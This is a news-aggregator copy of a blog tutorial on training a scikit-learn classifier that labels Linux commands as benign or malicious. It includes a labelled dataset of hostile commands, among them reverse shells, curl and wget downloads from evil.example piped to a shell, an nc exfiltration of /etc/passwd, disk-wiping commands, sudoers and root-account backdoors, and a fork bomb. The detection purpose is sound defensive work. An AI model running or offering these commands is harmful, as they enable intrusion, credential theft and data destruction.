{"slug": "ai-for-security-series-snapshot-1", "title": "AI For Security Series: (Snapshot 1)", "summary": "A developer published a proof-of-concept showing how a machine-learning classifier can flag malicious Linux commands that rule-based detection would miss. The project uses scikit-learn's TfidfVectorizer to convert commands into weighted token features and a RandomForestClassifier trained on a small labeled dataset of benign commands like 'ls -la' and malicious ones such as 'nc -e /bin/sh 10.0.0.5 4444'. The author notes the approach generalizes to unseen commands, unlike an if-then rule set, and that swapping models requires changing only the classifier line.", "body_md": "AI for Security (Series 1):\n\nAI CHANGED the way we work and the way we program, I am trying to push some series on AI For Security. (Which is how we use AI to build better security). These series are proof of concept, but they are powerful basics. One can build on it and improve.\n\nLet's build a very simple proof of concept for a small security project to find if the linux command is malicious or benign (non malicious or safe). For example, commands like rm -rf are considered more malicious than an ls command.\n\n**Normal Programming: **\n\nOne would think use the rule-based approach (IF-Then):\n\n``` python\ndef detect_command(cmd):\n    if \"rm -rf\" in cmd or \"/etc/passwd\" in cmd:\n        return \"malicious\"\n    return \"benign\"\n```\n\n**Machine Learning **\n\nI was trying to build a small proof of concept on finding if the command is malicious on python. The idea is that it can catch a command that it never saw it before.\n\nThe code in machine learning would look like this:\n\nThe mind-map:\n\nFirst install scikit learn\n\n```\npip install scikit-learn\npython\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\n\ndf = pd.read_csv(\"dataset.csv\")\n\nvectorizer = TfidfVectorizer()\nX = vectorizer.fit_transform(df['command'])\ny = df['label']\nclf = RandomForestClassifier()\nclf.fit(X, y)\n\ndef detect_command(cmd):\n    v = vectorizer.transform([cmd])\n    return clf.predict(v)[0]\n\nprint(detect_command(\"ls -la\"))\nprint(detect_command(\"nc -e /bin/sh 10.0.0.5 4444\"))\n```\n\nYou would need the dataset: Feel free to build yours but here is my full dataset:\n\n```\ncommand,label\nls -la,benign\ncd /home/user/projects,benign\ncat notes.txt,benign\npwd,benign\nmkdir backup,benign\ncp report.pdf /home/user/docs/,benign\ngit status,benign\ngit pull origin main,benign\npython3 app.py,benign\npip install requests,benign\ntop,benign\ndf -h,benign\ngrep error /var/log/app.log,benign\ntail -f /var/log/syslog,benign\nssh user@server.example.com,benign\nsudo apt update,benign\nnano config.yaml,benign\ntar -czf backup.tar.gz projects/,benign\nping -c 4 8.8.8.8,benign\nwhoami,benign\ncurl https://api.example.com/status,benign\ndocker ps,benign\necho hello world,benign\n\"find . -name \"\"*.py\"\"\",benign\nchmod 644 index.html,benign\nbash -i >& /dev/tcp/10.0.0.5/4444 0>&1,malicious\nnc -e /bin/sh 10.0.0.5 4444,malicious\ncurl http://evil.example/x.sh | sh,malicious\nwget http://evil.example/m -O /tmp/m; chmod +x /tmp/m; /tmp/m,malicious\nrm -rf / --no-preserve-root,malicious\ncat /etc/shadow,malicious\ncat /etc/passwd | nc 10.0.0.5 9001,malicious\necho ZWNobyBoaQ== | base64 -d | bash,malicious\nhistory -c && rm ~/.bash_history,malicious\nchmod 777 /etc/passwd,malicious\n\"(crontab -l; echo \"\"* * * * * /tmp/m\"\") | crontab -\",malicious\n\"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"\"10.0.0.5\"\",4444));pty.spawn(\"\"sh\"\")'\",malicious\ndd if=/dev/zero of=/dev/sda,malicious\nmkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 10.0.0.5 4444 > /tmp/f,malicious\ncurl -s http://evil.example/p.py | python3,malicious\n\"echo \"\"attacker ALL=(ALL) NOPASSWD:ALL\"\" >> /etc/sudoers\",malicious\nuseradd -o -u 0 backdoor,malicious\niptables -F,malicious\nwget -qO- http://evil.example/miner | bash,malicious\n:(){ :|:& };:,malicious\n```\n\nSome notes on the commands:\n\n1- TF-IDF: We applied that in the code in this line vectorizer = TfidfVectorizer()\n\nTF (Term Frequency): how often the word appears in this command. More often means more important to that command.\n\nIDF (Inverse Document Frequency): how rare the word is across all commands. cat shows up in 2 of 3 commands, so it's common and tells you little, and its score goes down. passwd shows up in only 1, so it's rare and distinctive, and its score goes up.\n\n2- Random Forest Prediction Model / this is a supervised learning.(check this line of code: clf = RandomForestClassifier())\n\n3- Look at the code again: *__fit__* to train, __*predict*__ to answer. So switching models means changing only the line that creates clf.\n\nIn conclusion, this is a proof of concept where you can use a model to provide prediction for security. For testing purpsoses you can try to choose different models other than random forest. In this example, we trained on all but the practice is to .fit on 80% of the dataset. Never grade the model on the same data you trained it on.", "url": "https://wpnews.pro/news/ai-for-security-series-snapshot-1", "canonical_source": "https://dev.to/saleemha/ai-for-security-series-snapshot-1-38cj", "published_at": "2026-10-07 13:37:40+00:00", "updated_at": "2026-10-07 13:47:24.808168+00:00", "lang": "en", "topics": ["machine-learning", "artificial-intelligence", "ai-tools"], "entities": ["scikit-learn", "RandomForestClassifier", "TfidfVectorizer", "Python"], "also_reported_by": [], "alternates": {"html": "https://wpnews.pro/news/ai-for-security-series-snapshot-1", "markdown": "https://wpnews.pro/news/ai-for-security-series-snapshot-1.md", "text": "https://wpnews.pro/news/ai-for-security-series-snapshot-1.txt", "jsonld": "https://wpnews.pro/news/ai-for-security-series-snapshot-1.jsonld"}}